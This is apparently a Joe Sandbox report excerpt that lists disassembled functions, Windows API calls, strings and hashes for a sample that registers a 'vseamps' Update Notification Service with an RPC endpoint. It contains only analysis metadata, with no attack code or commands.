Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FFE1A514804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE1A514861

Part of subcall function 00007FFE1A516BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFE1A516C07
Part of subcall function 00007FFE1A516BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE1A516C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A514939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE1A514B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A514C94

Strings

csm, xrefs: 00007FFE1A51487B
csm, xrefs: 00007FFE1A51495C
csm, xrefs: 00007FFE1A5148E2

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: fd499993ccf6b9c91935bab5288eeea4ce333aaa0ffc7c6b8897070e7816e7d5
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: 23D191B2B0CB4186EB609B66D4403BD7BB1FB46BA8F1051B6DA4D57B66DF38E481C700

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FFE1A51B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFE1A51B9E8
GetProcAddress.KERNEL32 ref: 00007FFE1A51B9F4

Strings

api-ms-, xrefs: 00007FFE1A51B932
ext-ms-, xrefs: 00007FFE1A51B945

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: 2bbef90cf95eb59c916a94d88193a724d16daee8ae5a7db9860beb69f51ae72f
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: 9A41B165B1DE0291EA168B17A8106BA2392BF06FF0F5A45B7DD0E477A4FE3CE4468340

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D
action, xrefs: 0000000140002A52

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

Security=impersonation static true, xrefs: 0000000140001952
ncalrpc, xrefs: 000000014000196D
ampIfEp, xrefs: 000000014000195E

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFE1A51712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171B1
GetLastError.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171E9
FreeLibrary.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A517257
GetProcAddress.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A517263

Strings

api-ms-, xrefs: 00007FFE1A5171D1

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: 5a141423fb5ada6dbdd1ba32ead31d9645ad61be14c52575c1722e978c5a716d
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: 7C31B421B1EE4191EE159B47A4009B92396BF4AFB0F5906F7ED2D07760EF3CE4468700

Function 00007FFE1A519444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE1A519453
FlsGetValue.KERNEL32 ref: 00007FFE1A519468
FlsSetValue.KERNEL32 ref: 00007FFE1A519489
FlsSetValue.KERNEL32 ref: 00007FFE1A5194B6
FlsSetValue.KERNEL32 ref: 00007FFE1A5194C7
FlsSetValue.KERNEL32 ref: 00007FFE1A5194D8
SetLastError.KERNEL32 ref: 00007FFE1A5194F3

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 30ea2a9775190e9d0a7abad356b8981684c8d2552a67def043a4f5008471f38a
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: 1A216F24B0CE4289FA69A36355911796163AF46FB0F1407F7E93E47AF6EE6CB4418240

Function 00007FFE1A520100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFE1A520131
GetLastError.KERNEL32 ref: 00007FFE1A52013D
CloseHandle.KERNEL32 ref: 00007FFE1A520155
CreateFileW.KERNEL32 ref: 00007FFE1A520180
WriteConsoleW.KERNEL32 ref: 00007FFE1A52019F

Strings

CONOUT$, xrefs: 00007FFE1A520161

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: 22a65687c932797a1dd63702ae1da1b25bf2878d2e8631af4845515c2a202a38
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: C9119A32B1CE41C2E3508B93A84473962A2BB89FF4F5002B7EA5D87BA4DF3CD9048744

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

Jul 5 2019, xrefs: 0000000140001216
usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
10:52:57, xrefs: 000000014000120F
Help, xrefs: 0000000140001238

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

